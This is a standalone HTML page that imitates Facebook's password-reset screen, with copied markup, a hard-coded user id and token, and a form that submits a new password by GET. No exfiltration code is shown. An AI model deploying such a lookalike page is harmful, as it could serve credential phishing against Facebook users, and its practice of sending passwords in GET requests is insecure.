<!DOCTYPE html>
<html>
<head>
    <title>Facebook Password Reset</title>
    <style>
        /* Add your CSS styles here */
        .uiInterstitial {
            max-width: 400px;
            margin: 0 auto;
        }
        .uiHeader {
            background-color: #4267B2;
            color: #fff;
            padding: 10px;
        }
        .uiHeaderTitle {
            font-size: 24px;
            margin: 0;
        }
        .uiInterstitialContent {
            padding: 20px;
        }
        .uiInfoTable {
            width: 100%;
        }
        .dataRow {
            vertical-align: top;
        }
        .label {
            width: 25%;
        }
        .data {
            width: 75%;
        }
        .passwordinput {
            width: 100%;
            padding: 5px;
            margin-bottom: 10px;
        }
        .uiButton {
            display: inline-block;
            padding: 5px 10px;
            background-color: #4267B2;
            color: #fff;
            border: none;
            cursor: pointer;
        }
        .uiButtonConfirm {
            background-color: #3b5998;
        }
        .uiButtonText {
            color: #fff;
            text-decoration: none;
        }
        .uiInterstitialBar {
            background-color: #f5f6f7;
            padding: 10px;
            text-align: right;
        }
    </style>
</head>
<body>
    <form method="get" action="/recover/password?u=100000233612389&amp;n=542903" onsubmit="return window.Event &amp;&amp; Event.__inlineSubmit &amp;&amp; Event.__inlineSubmit(this,event)" id="u_0_3">
        <input type="hidden" name="lsd" value="AVpICGr3" autocomplete="off">
        <div class="mvl ptm uiInterstitial uiInterstitialLarge uiBoxWhite">
            <div class="uiHeader uiHeaderBottomBorder mhl mts uiHeaderPage interstitialHeader">
                <div class="clearfix uiHeaderTop">
                    <div class="rfloat _ohf">
                        <h2 class="accessible_elem">Choose a new password</h2>
                        <div class="uiHeaderActions"></div>
                    </div>
                    <div>
                        <h2 class="uiHeaderTitle" aria-hidden="true">Choose a new password</h2>
                    </div>
                </div>
            </div>
            <div class="phl ptm uiInterstitialContent">
                <div class="mvm uiP fsm">A strong password is a combination of letters and punctuation marks. It must be at least 6 characters long.</div>
                <table class="uiInfoTable" role="presentation">
                    <tbody>
                        <tr class="dataRow">
                            <th class="label"><label for="password_new">New Password</label></th>
                            <td class="data">
                                <input type="password" class="passwordinput" id="password_new" name="password_new" tabindex="1" autocomplete="off">
                                <label class="mls uiButton" for="u_0_0"><input value="?" onclick="show_pwd_help(); return false;" tabindex="3" type="button" id="u_0_0"></label>
                                <div id="password_new_status"></div>
                            </td>
                        </tr>
                        <tr class="dataRow">
                            <th class="label"><label for="password_confirm">Confirm Password</label></th>
                            <td class="data">
                                <input type="password" class="passwordinput" id="password_confirm" name="password_confirm" tabindex="2" autocomplete="off">
                                <div id="password_confirm_status"></div>
                            </td>
                        </tr>
                    </tbody>
                </table>
                <div class="mvl">
                    <div class="uiInputLabel clearfix">
                        <label class="_kv1 _55sg uiInputLabelInput"><input type="checkbox" name="reason" value="kill_sessions" id="u_0_1"><span></span></label>
                        <label for="u_0_1" class="uiInputLabelLabel">Log me out of Facebook everywhere else my account might be open. (Choose this if a stranger used your account.)</label>
                    </div>
                </div>
            </div>
        </div>
        <div class="uiInterstitialBar uiBoxGray topborder">
            <div class="clearfix">
                <div class="rfloat _ohf">
                    <label class="uiButton uiButtonConfirm" id="btn_continue" for="u_0_2"><input value="Continue" name="btn_continue" type="submit" id="u_0_2"></label>
                    <a class="uiButton" href="/" role="button" name="reset_action"><span class="uiButtonText">Cancel</span></a>
                </div>
                <div class="pts"></div>
            </div>
        </div>
    </form>
    <script>
        // Add your JavaScript code here
        function show_pwd_help() {
            // Show help message or perform other actions
            alert("Your password should be at least 6 characters long and contain a combination of letters, numbers, and punctuation.");
        }
    </script>
</body>
</html>
